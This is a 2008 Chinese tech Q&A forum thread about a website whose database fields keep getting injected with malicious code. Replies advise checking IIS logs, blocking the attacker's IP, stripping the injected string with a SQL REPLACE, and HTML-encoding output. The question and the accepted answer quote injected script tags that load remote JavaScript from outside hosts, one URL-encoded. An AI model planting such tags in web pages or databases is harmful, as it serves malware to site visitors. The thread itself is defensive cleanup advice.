首页 新闻 会员 周边

数据库遭攻击

0
悬赏园豆:30 [已解决问题] 解决于 2008-05-14 12:08
<DIV class=Content> <P>数据表里字段值老是被插入<FONT face=Verdana>&lt;script src=http://%61%31%38%38%2E%77%73/1.js&gt;&lt;/script&gt;</FONT></P> <P><FONT face=Verdana>请各位大哥帮忙该如何清理及预防</FONT></P></DIV>
江闯的主页 江闯 | 初学一级 | 园豆:130
提问于:2008-05-08 11:18
< >
分享
最佳答案
0
查看IIS日志是可以找到攻击者IP的,封掉之后可以预防下次再受这个IP的攻击。 修复数据库方法: REPLACE ( 'string_expression1' , 'string_expression2' , 'string_expression3' ) 示例:update 表 set 字段= REPLACE(Title, '</title></pre>><script src=http://sb.5252.ws:88/107/1.js></script><', '')
任力 | 小虾三级 |园豆:1124 | 2008-05-14 12:06
其他回答(7)
0
查看iis的日志(c:\windows\system32\logfiles\W3SVC*目录下),找到攻击者的ip,然后封了这个ip.
deerchao | 园豆:8367 (大侠五级) | 2008-05-08 11:31
0
<script src=http://a188.ws/1.js></script> -------------------------------- 标签进行处理啊,这样就可以显示,但不能被执行了,像博客园一样, 你输入<script>alert('测试')</script>,提交到数据库把<>进行了处理。 在asp.net中可以使用HttpUtility.HtmlEncode()进行处理就行了.
liy | 园豆:30 (初学一级) | 2008-05-08 12:16
0
http://space.cnblogs.com/question/1279/
侯垒 | 园豆:3435 (老鸟四级) | 2008-05-08 12:39
0
这种应该是被挂马了,是有了目录权限以后,用工具进行批量挂马的,一般是asp的。要看看你程序是否有漏洞,还要记得删除上传的挂马工具。
小龟爬爬 | 园豆:255 (菜鸟二级) | 2008-05-08 13:16
0
我看到被挂马后的结果了,很难看呀
伽马科技.攻城师 | 园豆:1303 (小虾三级) | 2008-05-08 18:30
0
找出插入的源头吧
风海迷沙 | 园豆:4453 (老鸟四级) | 2008-05-09 10:43
0
服务器安全有问题,让你们的网管查看服务器安全;把没有用的服务,端口统统封掉。
玉开 | 园豆:8822 (大侠五级) | 2008-05-14 11:26
清除回答草稿
   您需要登录以后才能回答,未注册用户请先注册